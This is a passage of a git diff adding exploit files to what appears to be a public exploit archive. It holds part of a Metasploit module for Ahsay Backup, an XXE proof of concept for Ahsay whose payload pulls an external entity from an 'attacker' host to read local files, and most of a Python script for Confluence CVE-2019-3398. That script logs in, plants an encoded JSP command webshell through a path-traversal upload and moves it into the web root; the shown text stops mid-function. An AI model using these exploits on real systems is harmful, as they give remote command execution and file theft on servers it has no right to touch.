+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    res = send_request_cgi({
+      #/obs/obm7/file/delete?X-RSW-custom-encode-path=../../user/xyz
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','delete'),
+      'method' => 'DELETE',
+      'headers' => headers,
+      'vars_get' => {
+        'X-RSW-custom-encode-path' => fileLocation,
+        'recursive' => recursive
+      }
+    })
+ 
+    if res and res.code == 200
+      res.body
+    end
+  end
+ 
+  def check
+    #We need a cookie first
+    cookie_res = send_request_cgi({
+      #/cbs/system/ShowDownload.do
+      'uri' => normalize_uri(target_uri.path, 'cbs','system','ShowDownload.do'),
+      'method' => 'GET'
+    })
+ 
+    if cookie_res and cookie_res.code == 200
+      cookie = cookie_res.get_cookies.split()[0]
+    else
+      return Exploit::CheckCode::Unknown
+    end
+ 
+    if defined?(cookie)
+      #request the page with all the clientside software links.
+      headers = {}
+      headers['Cookie'] = cookie
+      link = send_request_cgi({
+        #/cbs/system/ShowDownload.do
+        'uri' => normalize_uri(target_uri.path, 'cbs','system','download','indexTab1.jsp'),
+        'method' => 'GET',
+        'headers' => headers
+      })
+ 
+      if link and link.code == 200
+        link.body.each_line do |line|
+          #looking for the link that contains obm-linux and ends with .sh
+          if line.include? '<a href="/cbs/download/' and line.include? '.sh' and line.include? 'obm-linux'
+            filename = line.split("<a")[1].split('"')[1].split("?")[0]
+            filecontent = send_request_cgi({
+              #/cbs/system/ShowDownload.do
+              'uri' => normalize_uri(target_uri.path, filename),
+              'method' => 'GET',
+              'headers' => headers
+            })
+            if filecontent and filecontent.code == 200
+              filecontent.body.each_line do |l|
+                if l.include? 'VERSION="'
+                  number = l.split("=")[1].split('"')[1]
+                  if number.match /(\d+\.)?(\d+\.)?(\d+\.)?(\*|\d+)$/
+                    if number <= '8.1.1.50' and not number < '7'
+                      return Exploit::CheckCode::Appears
+                    else
+                      return Exploit::CheckCode::Safe
+                    end
+                  end
+                end
+              end
+            else
+              return Exploit::CheckCode::Unknown
+            end
+          end
+        end
+      else
+        return Exploit::CheckCode::Unknown
+      end
+    else
+      return Exploit::CheckCode::Unknown
+    end
+ 
+  end
+end
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47181.txt b/exploits/jsp/webapps/47181.txt
new file mode 100644
index 000000000..7e4708532
--- /dev/null
+++ b/exploits/jsp/webapps/47181.txt
@@ -0,0 +1,28 @@
+# Unauthenticated XML External Entity (XXE) in Ahsay Backup v7.x - v8.1.0.50. 
+# Date: 26-6-2019
+# Exploit Author: Wietse Boonstra
+# Vendor Homepage: https://ahsay.com
+# Software Link: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe
+# Version: 7.x < 8.1.0.50
+# Tested on: Windows / Linux
+# CVE : CVE-2019-10266
+
+#Ahsay is vulnerable to a OOB Unauthenticated XML External Entity
+#More info https://www.wbsec.nl/ahsay/#CVE-2019-10263
+
+Sending the following POST request will trigger the XXE:
+
+POST /obs/obm8/user/setUserProfile HTTP/1.1
+Content-Type: application/octet-stream
+Content-Length: 126
+Host: 172.16.238.213:80
+        
+<?xml version="1.0"?>
+ <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker/oob"> %remote;%intern; %trick;]>
+
+On http://attacker/oob add the following content:
+
+<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY &#37;
+        trick SYSTEM 'file://:%payl;/%payl;'>">
+
+Here it is possible to change file:///c:/ to any directory/file or internal host.
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47621.py b/exploits/jsp/webapps/47621.py
new file mode 100755
index 000000000..9cc6c0476
--- /dev/null
+++ b/exploits/jsp/webapps/47621.py
@@ -0,0 +1,357 @@
+# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: max7253
+# Vendor Homepage: https://www.atlassian.com
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: 6.15.1
+# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu
+# CVE : 2019-3398
+
+#Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)
+#To use this exploit you should specify the following variables:
+#OS - Linux or Windows.
+#PROTO - http or https.
+#USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server.
+#HOSTNAME - the domain name or IP address of the server and its port.
+#ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
+#Typical ROOTFOLDER locations are:
+#Windows: Program Files/Atlassian/Confluence/confluence/pages/
+#Linux: opt/atlassian/confluence/confluence/pages/
+#Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).
+#PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files.
+#For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
+#If PAGEID is set to 0, the script will try to create a new Page ID in one of the available spaces. If it fails, it will try to create a new space and create a Page ID there.
+#If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range and try to upload shellcode till it succeeds.
+#The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the webshell, then imitates the 'Download all' action to place the webshell to the root directory of the web server.
+#Tested on Atlassian v6.15.1. on Linux and Windows.
+#Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5.
+import requests
+import urllib3
+import base64
+from bs4 import BeautifulSoup
+import numpy as np
+import re
+import json
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+OS = 'Windows' #change this parameter
+PROTO = 'http' #change this parameter
+USERNAME = 'test' #change this parameter
+PASSWORD = 'test' #change this parameter
+HOSTNAME = '192.168.198.144:8090' #change this parameter
+ROOTFOLDER = 'Program Files/Atlassian/Confluence/confluence/pages/' #change this parameter (Windows)
+#ROOTFOLDER = 'opt/atlassian/confluence/confluence/pages/' #change this parameter (Linux)
+PAGEID = '0'#'1245201' #change this parameter
+PAGEID_RANGE_START = np.int64(1) #change this parameter
+PAGEID_RANGE_END = np.int64(999999999999) #change this parameter
+ATLTOKEN = ''
+LOGINURL = '%s://%s/dologin.action' % (PROTO, HOSTNAME)
+UPLOADURL = '%s://%s/plugins/drag-and-drop/upload.action' % (PROTO, HOSTNAME)
+DOWNLOADALLURL = '%s://%s/pages/downloadallattachments.action' % (PROTO, HOSTNAME)
+CREATEPAGEURL = '%s://%s/pages/createpage.action?spaceKey=' % (PROTO, HOSTNAME)
+VIEWSPACESURL= '%s://%s/rest/api/space' % (PROTO, HOSTNAME)
+WEBSHELLURL = '%s://%s/pages/assist.jsp' % (PROTO, HOSTNAME)
+
+SHELLCODE_WINDOWS = 'PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \
+48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \
+VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \
+I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \
+dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \
+BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \
+MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
+AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \
+VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \
+NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \
+AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \
+dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \
+VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \
+MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \
+AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMDlcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlc \
+dTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \
+FcdTAwNkVcdTAwNjRcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAw \
+NTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdT \
+AwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNjVcdTAwMjJcdTAwMkNc \
+dTAwMjBcdTAwMjJcdTAwMkZcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNz \
+FcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAw \
+NjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdT \
+AwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNj \
+NcdTAwNjVcdTAwNzNcdTAwNzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAw \
+NzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdT \
+AwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVc \
+dTAwNjVcdTAwNzhcdTAwNjVcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \
+FcdTAwNkVcdTAwNjRcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdT \
+AwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBc \
+dTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNz \
+RcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAw \
+MjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \
+AwMjBcdTAwMjBcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \
+dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \
+BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAw \
+NTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdT \
+AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFc \
+dTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNz \
+JcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAw \
+MjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdT \
+AwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRc \
+dTAwMjhcdTAwNjlcdTAwNkVcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAw \
+NjdcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdT \
+AwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVc \
+dTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAw \
+MjhcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
+AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAw \
+NzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdT \
+AwNzNcdTAwNzJcdTAwMjlcdTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBc \
+dTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNj \
+RcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAw \
+MEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT \
+4KPC9wcmU+CjwvQk9EWT48L0hUTUw+'
+
+SHELLCODE_LINUX ='PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \
+48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \
+VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \
+I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \
+dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \
+BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \
+MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
+AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \
+VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \
+NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \
+AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \
+dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \
+VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \
+MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \
+AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNU \
+JcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \
+MjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdT \
+AwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdTAwMjJcdTAwMkZcdTAwNjJc \
+dTAwNjlcdTAwNkVcdTAwMkZcdTAwNzNcdTAwNjhcdTAwMjJcdTAwMkNcdTAwMjBcdTAwMjJcdTAwMk \
+RcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAw \
+NzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdT \
+AwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRc \
+dTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNjNcdTAwNjVcdTAwNzNcdTAw \
+NzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdT \
+AwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTJcdTAwNzVcdTAwNkVc \
+dTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNj \
+VcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \
+MjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \
+AwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \
+dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \
+BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAw \
+NzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdT \
+AwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDlc \
+dTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNk \
+RcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAw \
+NjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdT \
+AwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwND \
+lcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAw \
+NkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdT \
+AwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVc \
+dTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwNjlcdTAwNk \
+VcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwMjBcdTAwNjRcdT \
+AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVc \
+dTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMj \
+lcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAwMjhcdTAwMjBcdTAwNjRcdT \
+AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNzVcdTAwNkNc \
+dTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAwNzBcdTAwNzJcdTAwNjlcdT \
+AwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjlc \
+dTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNj \
+RcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAw \
+NkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAwMEFcdTAwMjBcdTAwMjBcdT \
+AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT4KPC9wcmU+CjwvQk9EWT48 \
+L0hUTUw+'
+session = requests.session()
+#proxies = {
+# 'http': 'http://127.0.0.1:8080',
+# 'https': 'https://127.0.0.1:8080'
+#}
+
+def do_authenticate():
+	global ATLTOKEN
+	auth_form_data = {
+		'os_username': USERNAME,
+		'os_password': PASSWORD,
+		'login': 'Log+in',
+		'os_destination': ''
+	}
+
+	r = session.post(LOGINURL, data=auth_form_data, allow_redirects=True, verify=False)#, proxies=proxies)
+	
+	if r.text.find('re-enter your login') != -1:
+		print 'Authentication failed'
+		return 0			
+	elif r.text.find('Sorry, your username and/or password are incorrect') != -1:
+		print 'Authentication failed'
+		return 0
+	elif r.text.find('Unauthorized') != -1:
+		print 'Unauthorized'
+		return 0
+	else:
+		print 'Authentication successful'
+
+	soup = BeautifulSoup(r.text, 'html.parser')
+	ATLTOKEN = soup.find('meta', {'id': 'atlassian-token'})['content']
+	print 'Atlassian token %s' % (ATLTOKEN)
+	return 1
+
+def do_upload(_pageid):
+	if OS == 'Windows':
+		upload_form_data = SHELLCODE_WINDOWS
+
+		upload_req_params = {
+			'pageId': _pageid,
+			'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp',
+			'size': '3474',
+			'mimeType': 'text/plain',
+			'spaceKey': 'isis',
+			'atl_token': ATLTOKEN,
+			'name': 'assist'
+		}
+	elif OS == 'Linux':
+
+		upload_form_data = SHELLCODE_LINUX
+		upload_req_params = {
+			'pageId': _pageid,
+			'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp',
+			'size': '3516',
+			'mimeType': 'text/plain',
+			'spaceKey': 'isis',
+			'atl_token': ATLTOKEN,
+			'name': 'assist'
+		}
+
+	print 'Uploading webshell'
+	r = session.post(UPLOADURL, params=upload_req_params, data=base64.decodestring(upload_form_data), allow_redirects=True, verify=False)#, proxies=proxies)
+	if r.status_code == 200 and r.text.find('actionErrors') == -1:
+		print 'Webshell uploaded'
+		return 1		
+	else:
+		print 'Error while uploading webshell'
+		return 0
+
+def do_downloadall(_pageid):
+	downloadall_req_params = {
+		'pageId': _pageid
+	}
+	print 'Moving webshell to the root directory of the web server'
+	r = session.get(DOWNLOADALLURL, params=downloadall_req_params, allow_redirects=True, verify=False)#, proxies=proxies)
+	r = session.get(WEBSHELLURL, allow_redirects=True, verify=False)#, proxies=proxies)
+
+	if r.status_code == 200:
+		print 'Webshell found' 
+		print 'Visit %s' % WEBSHELLURL
+		return 1
+	else:
+		print 'Webshell not found'
+		return 0
+def do_getspaces():
+	print 'Getting spaces'
+	r = session.get(VIEWSPACESURL, allow_redirects=True, verify=False)#, proxies=proxies)
+	spacelist = re.findall(r'\"key\":\"(\w+)\"', r.text)
+	return spacelist
+
+def do_createspace():
+	print 'Creating space'
+	upload_form_data = json.dumps({
+		"key": "TST1",
+		"name": "Example space",
+		"description": {
+			"plain": {
+			"value": "This is an example space",
+			"representation": "plain"
+			}
+		},
+		"metadata": {}
+	})
+
+	headers = {
+		'Content-Type': 'application/json'
+	}
+	r = session.post(VIEWSPACESURL, data=upload_form_data, headers=headers, allow_redirects=True, verify=False)#, proxies=proxies)
+
+	matched = re.match(".*\"key\":\"(\w+)\".*", r.text)
+	if matched:
+		print 'Space created'
+		return matched.group(1)
+	else:
+		print 'Space not created'
+		return 0
+
+def do_createpage(space):
+	global PAGEID
+	print 'Trying %s space' % (space)
+	r = session.get(CREATEPAGEURL+space, allow_redirects=True, verify=False)#, proxies=proxies)
+	if r.status_code == 200 and r.text.find('ajs-draft-id') != -1:
+		soup = BeautifulSoup(r.text, 'html.parser')
